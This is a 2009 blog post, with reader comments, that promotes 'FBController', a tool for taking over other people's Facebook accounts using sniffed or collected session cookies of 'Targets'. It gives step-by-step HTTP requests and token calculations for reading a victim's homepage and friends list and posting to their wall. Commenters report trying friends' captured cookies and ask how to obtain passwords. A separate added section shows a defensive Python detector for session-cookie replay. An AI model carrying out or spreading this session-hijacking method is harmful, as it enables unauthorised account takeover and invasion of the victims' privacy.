FBConTroller [ FACEBOOK CONTROLLER ] - The Ultimate Facebook Controller (without the Password)
Thursday, 30. April 2009, 20:05:27
Let me make clear that this utility WON'T hack/crack Facebook accounts!
The utility will need biscuits/cookies instead of the password.
Log in to your Facebook account and sniff your cookie OR collect a few live Facebook Biscuit/s of your Target/s.
1 ] Generate an original (OG) 10-digit Unix timestamp. If possible, it should not be much older than Facebook.com's current system time.
2 ] Send a GET Request to www.facebook.com port 80 after calculating the required variables (below)
GET /home.php? HTTP/1.1
Cookie: datr=(10-DIGIT-CURRENT-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; cvr_tx=(OG-TIME-STAMP+63-TOTAL-SHOULD-BE-10-DIGIT-NEWTIMESTAMP)859; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US
3 ] From the Response Obtained :
Obtain the variable nctr[nid]. For now keep nctr[id] the same as nctr[nid].
Calculating the new nctr[ct] :
Add 79 to the original timestamp, then append 3 more digits to its end.
Calculating &oldest= :
Subtract 144556 from the original timestamp.
Calculating composer_id :
Search for
UIComposer_STATE_PIC_OUTSIDE\" id=\"
This will be your composer_id at the later stage in the Status Update Page / Other Post Request
Calculating post_form_id
Search for
post_form_id:"
This will be your post_form_id at the later stage in the Status Update Page / Other Post Request
Calculating fb_dtsg
Right after post_form_id (explained just above this section) you can locate fb_dtsg.
Else Search for
,fb_dtsg:"
This will be your fb_dtsg at the later stage in the Status Update Page / Other Post Request
Your login_x actually looks like
a:2:{s:5:"email";s:13:"you@youremailprovider.com";s:19:"remember_me_default";b:0;}
But keep it unchanged in its URL-encoded (hex-escaped) form, as it appears in the cookie.
4 ] Send a GET Request like below with the above calculated variables :
GET /ajax/intent.php?hidden_count=5&oldest=(10-DIGIT-NEWLY-CALCULATED)&delay_load_count=15&request_type=none&nctr[id]=(32-HEX-STRING-OBTAINED-FROM-home.php-)&nctr[nid]=(32-HEX-STRING-OBTAINED-FROM-home.php-)&nctr[ct]=(NEWLY-CALCULATED-10-DIGIT-TIMESTAMP)750 HTTP/1.1
Accept: */*
Accept-Language: en-US
XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
x-svn-rev: 161013
UA-CPU: x86
XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Connection: Keep-Alive
Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F%2Fwww.facebook.com%2Fhome.php
5 ] In the output :
Search for Env[\"nctrlid\"]=\"
This is the NEW TRUE nctr[id]= for the Status Update POST Request :-)
6 ] Generate a new POST Request with the above calculated new variables :
POST /updatestatus.php HTTP/1.1
Accept: */*
Accept-Language: en-US
XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
x-svn-rev: 161013
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Content-Length: 343
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F%2Fwww.facebook.com%2Fhome.php

action=HOME_UPDATE&home_tab_id=1&profile_id=(YOUR-10-DIGIT-PROFILE-ID)&status=TYPE-THE-STATUS-HERE&target_id=0&&composer_id=(24-HEX-STRING-OBTAINED-FROM-home.php-RESPONSE))&post_form_id=(32-HEX-STRING-FROM-home.php-RESPONSE)&fb_dtsg=(27-HEX-STRING-)-FROM-home.php-RESPONSE&post_form_id_source=AsyncRequest&nctr[id]=(32-HEX-STRING-CALCULATED-AS-EXPLAINED-IN-POINT-5)&nctr[nid]=(32-HEX-STRING-OBTAINED-FROM-home.php-RESPONSE)&nctr[ct]=(10-DIGIT-CALCULATED-TIMESTAMP-AS-EXPLAINED-In-POINT-3)375
7 ] Use the above variables to view any content with the appropriate GET / requests
8 ] For POST-ing / making changes, go to 2 ] and redo :-)
Looks like loads of hard work, huh?
If you don't want to do all this manually, then you can download this tool named FBController (FACEBOOK CONTROLLER), written by me. You can also call it FACEBOOKIE, FACEHOOKER (since it hooks in someone else's cookies), FACEBHOOT or FACEBHOOK.
So far, FBController version 1.0 uses your Target's provided cookie and only:
A > Downloads the HomePage.
B > Allows you to update the Target's Wall, and
C > Retrieves your Target's Friends List.
More features to come in version 2.0.
A 26th April Release !
Research duration some 33 hours - Sunday Evening 26th April 2009 -to- 29th April 2009.
Happy Controlling ! :-)
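A defender-side view of the steps above, as an added example that is not part of the original post or of the FBController tool: since the requests prove identity with cookies alone (xs, c_user) sent over port 80, a server can look for one session being used by two different clients. The pipe-delimited log format, the function names and every sample value are assumptions constructed for illustration.

```python
# Added example: flag a session cookie that shows up from a second client.
# Constructed sample log: ts|client IP|method|path|c_user|xs|User-Agent
SAMPLE_LOG = """\
1241000000|198.51.100.7|GET|/home.php|1000000001|aaaa1111|Mozilla/5.0 Firefox/3.0
1241000030|198.51.100.7|POST|/updatestatus.php|1000000001|aaaa1111|Mozilla/5.0 Firefox/3.0
1241000090|203.0.113.50|GET|/home.php|1000000001|aaaa1111|Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
1241000095|203.0.113.50|GET|/ajax/intent.php|1000000001|aaaa1111|Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
1241000099|203.0.113.50|POST|/updatestatus.php|1000000001|aaaa1111|Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
1241000200|192.0.2.10|GET|/home.php|1000000002|bbbb2222|Mozilla/5.0 Safari/528
"""

def parse(line):
    """Split one constructed log line into a dict of typed fields."""
    ts, ip, method, path, c_user, xs, ua = line.split("|", 6)
    return {"ts": int(ts), "ip": ip, "method": method, "path": path,
            "session": (c_user, xs), "ua": ua}

def find_replayed_sessions(log_text, window=3600):
    """Return one alert per session that is reused, within `window` seconds of
    its first use, by a client whose IP *and* User-Agent both differ from the
    first client. `posted` is True if that second client sent a POST."""
    first_seen = {}   # session -> (ip, ua, ts) of the first request
    alerts = {}       # session -> alert dict
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse(line)
        sess = ev["session"]
        if sess not in first_seen:
            first_seen[sess] = (ev["ip"], ev["ua"], ev["ts"])
            continue
        ip0, ua0, t0 = first_seen[sess]
        # Requiring both fields to change cuts noise from roaming or NAT.
        if ev["ip"] != ip0 and ev["ua"] != ua0 and ev["ts"] - t0 <= window:
            alert = alerts.setdefault(sess, {
                "c_user": sess[0], "owner_ip": ip0,
                "second_ip": ev["ip"], "posted": False})
            if ev["method"] == "POST":
                alert["posted"] = True
    return list(alerts.values())

if __name__ == "__main__":
    for alert in find_replayed_sessions(SAMPLE_LOG):
        print(alert)
```

This check only detects reuse after the fact and misses a client that copies the owner's User-Agent; serving the whole session over TLS with cookies marked Secure is what keeps the cookie from being sniffed in the first place.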



quakerdoomer # 1. May 2009, 04:26
Threatfire says that FBController "**STEALS**" Biscuits !
Also, Threatfire thinks malware distributors have now started distributing malware via mailing lists. ROFL !
It's very disappointing to read such a careless irresponsible post from something like Threatfire !
I wouldn't be surprised if they develop a signature to thwart FBController from being transferred on the wire !
quakerdoomer # 3. May 2009, 05:26
Threatfire Blog (maybe after reading the above comment) quietly changed their statement
From:
"Another technique and tool has just been posted to steal biscuits, much like the Koobface worm, and it supports changing a wall without the password. The author claims to have just completed "FBController - The Ultimate Utility to Control Facebook accounts without the Password". "
To:
"Another technique and tool has just been posted to abuse stolen biscuits, much like the Koobface worm, and it supports changing a wall without the password."
Good Boy
Anonymous # 8. May 2009, 23:49
I tried this with my own cookie info.
I also tried this with a friend's captured cookie data.
I always get an "Incorrect Cookie or Cookie Expired" error.
Below is the server's response.
HTTP/1.1 301 Moved Permanently
Date: Fri, 08 May 2009 23:44:22 GMT
Server: Apache/1.3.41.fb2
P3P: CP="HONK"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Edge-control: cache-maxage=10m
Location: http://static.ak.facebook.com/login.php
X-Cnection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
0
Any ideas??
quakerdoomer # 9. May 2009, 15:41
Did you get the Message "Logged in as:" ?
Check if you were able to pull down any of the following :
The Target's Home(First)Page, IntentPage, Ajax Chat Page, Profile Page.
Check if these html files got created in the FBConTroller folder.
quakerdoomer # 9. May 2009, 19:01
Anonymous # 19. May 2009, 00:13
I'm still confused about how to use this tool. When I open this tool, a command prompt appears on the desktop, so I read it all, and there is a message that told me to "press any key to continue", and I did what it said, but nothing happened and the command prompt disappeared with nothing changed. I tried again with my FB account open and did the same thing, but nothing happened either. Could you tell me how to use this tool, maybe step by step? I'm sorry, thanks a lot.
Anonymous # 25. May 2009, 16:10
FBConTroller version 2.0
Anonymous # 28. May 2009, 19:08
Can you provide a step-by-step guide for those of us who don't know HTML that well?
quakerdoomer # 31. May 2009, 18:12
Anonymous # 2. June 2009, 22:25
I can't seem to find the XS var. Is it still there?
quakerdoomer # 3. June 2009, 17:32
P.S. Version 2 will eliminate the need to type/paste in individual variables.
Anonymous # 29. June 2009, 13:59
Can you tell me how to use that tool step by step?
Because I have tried, but that didn't work.
Thanks, doomer ^_^
Anonymous # 5. July 2009, 20:42
I am in the same position as the previous person. It would be highly appreciated if you can create a Step by step guide on how to use this Program. Thank You!
Anonymous # 10. July 2009, 17:24
Hi Azim,
I tried to understand but I have a problem: where can I find the "53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES"?
Thanks a lot
Anonymous # 16. July 2009, 04:13
How do I use the FBController program?
Anonymous # 26. July 2009, 07:40
Great job! I couldn't use it, though, because I couldn't find all the cookies required: xs, c_user and h_user. However, as far as I have read, the power of FBController is very limited. I hope that you will release a more powerful version soon. One more thing: it would be great if you released a GUI version too, because most people are not familiar with coding.
Anonymous # 26. July 2009, 07:59
Is there any way to actually do anything with this?
I entered using my cookies and some friends' as well but was unable to do anything with it. Maybe you can help with logging in to Facebook with those cookies?
Anonymous # 3. August 2009, 16:44
Hello,
If I got the cookie, what should I do? Where is the FBController function?
Thanks
Anonymous # 25. October 2009, 16:33
Hi there,
Is it possible to set cookie parameters manually in the browser? If yes, which parameters should I consider adding? I usually use Firefox add-ons to edit a cookie and set it to what I want. I just don't know how I should do it with FB cookies.
Anonymous # 17. November 2009, 09:12
Hello,
I have a question:
if I have an account username, can I get its password,
or how can I get it?
Thanks
Anonymous # 25. November 2009, 20:37
kacook banyak nian tegawe apo>..?????